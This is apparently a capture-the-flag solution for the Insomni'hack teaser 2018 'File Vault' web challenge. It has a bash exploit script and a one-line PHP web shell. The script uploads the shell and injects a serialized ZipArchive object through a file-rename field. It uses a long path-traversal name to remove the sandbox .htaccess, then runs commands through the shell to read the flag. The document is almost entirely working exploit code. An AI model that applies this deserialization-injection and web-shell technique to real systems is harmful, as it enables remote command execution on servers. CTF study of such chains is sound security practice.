Insomni'hack teaser 2018 - [Web] File Vault

exploit.sh

#!/bin/bash
URL="http://filevault.teaser.insomnihack.ch"
SANDBOX_DIR="827bfe788a9d99ceecaef263c52e34a1570c8349"

curl -c cookie.txt "$URL/?action=reset"
curl -b cookie.txt -c cookie.txt "$URL/?action=upload" -F "vault_file=@shell.php"
curl -b cookie.txt -c cookie.txt "$URL/?action=upload" -F "vault_file=@shell.php"

curl -b cookie.txt -c cookie.txt "$URL/?action=changename&i=1" -d 'newname=;s:8:"realname";s:9:"aaaaaaaaa";}i:1;O:10:"ZipArchive":5:{s:6:"status";i:0;s:9:"statusSys";i:0;s:8:"numFiles";i:0;s:8:"realname";i:8;s:8:"filename";s:67:"'
curl -b cookie.txt -c cookie.txt "$URL/?action=changename&i=0" -d "newname=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../.php"

curl -b cookie.txt -c cookie.txt "$URL/?action=changename&i=1" -d "newname=sandbox/$SANDBOX_DIR/.htaccess"
curl -b cookie.txt -c cookie.txt "$URL/?action=open&i=1" > /dev/null 2>&1

curl -b cookie.txt -c cookie.txt "$URL/sandbox/$SANDBOX_DIR/$(sha1sum shell.php | awk '{ print $1 }').php?cmd=cat+/flag"

shell.php

<?php
passthru($_GET['cmd']);